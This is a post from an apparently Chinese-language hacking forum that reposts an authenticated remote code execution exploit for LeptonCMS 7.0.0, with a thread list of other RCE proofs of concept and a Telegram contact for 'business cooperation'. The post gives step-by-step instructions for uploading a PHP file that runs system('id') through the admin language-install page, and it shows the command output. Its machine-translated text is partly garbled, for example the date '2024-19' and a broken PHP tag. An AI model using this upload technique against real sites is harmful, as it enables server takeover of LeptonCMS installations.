LeptonCMS 7.0.0-远程代码执行（RCE）（身份验证）

主题发起人 HackApt-37 Team
开始时间 04 9, 2025

黑客倉庫站長

贡献: 83%

04 9, 2025

＃利用标题: LeptonCMS 7.0.0-远程代码执行（RCE）（身份验证）
＃日期: 2024-19
＃利用作者: TMRSWRR
＃类别: WebApps
＃供应商homepage3360 https://www.lepton-cms.com/
＃版本: 7.0.0
1）登录管理委员会https://127.0.0.1/lepton/backend/login/index.php
2）转到语言位置https://127.0.0.1/lepton/backend/backend/languages/index.php
3）在语言中上传升级。php文件？php echo system（'id'）;
4）单击安装后，您将看到结果
＃结果: UID=1000（Lepton）GID=1000（Lepton）组=1000（Lepton）UID=1000（Lepton）GID=1000（Lepton）组=1000（Lepton）

员工管理系统1.0-`txtfullname`和`txtphone sql注入

FOF漂亮邮件1.1.2-服务器端模板注入（SSTI）

点击展开...

好评 0 否决票

您必须登录或注册才可回复。

	Viessmann Vitogate 300 2.1.3.0——远程代码执行 (RCE) Root #Hack7er1949 01 21, 2025 POC/?Day
	POC pgAdmin 8.4 远程代码执行漏洞 Root #Hack7er1949 09 11, 2024 POC/?Day
	POC Apache Tapestry远程代码执行漏洞 Shacker 09 13, 2024 POC/?Day
	CE Phoenix v1.0.8.20——远程代码执行 Root #Hack7er1949 01 21, 2025 POC/?Day
	POC Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109 Shacker 09 13, 2024 POC/?Day

Partner Website 友情鏈接 : 臺灣駭客團隊論壇全球最大的中文黑客论坛 한국 해커 팀 포럼 dark Web hacking team 骇客团队 HACKER.BZ UKhacker
暗网黑客论坛网站：声明，本网站的教程、文章、工具和其他相关内容仅供学习和研究使用，旨在提高公众的网络安全意识和防护能力。
我们强烈反对任何形式的非法活动，禁止未经授权的入侵、攻击、破坏他人的网络系统等行为。
Copyright © 2013-2025 HACK 您可以联系我们的Telegram进行业务合作： @HackAptTeam 网站地图Sitemap

本站需要使用 Cookie。如果您继续使用本站，则表示同意我们使用 Cookie。

接受了解更多。...

后退

顶部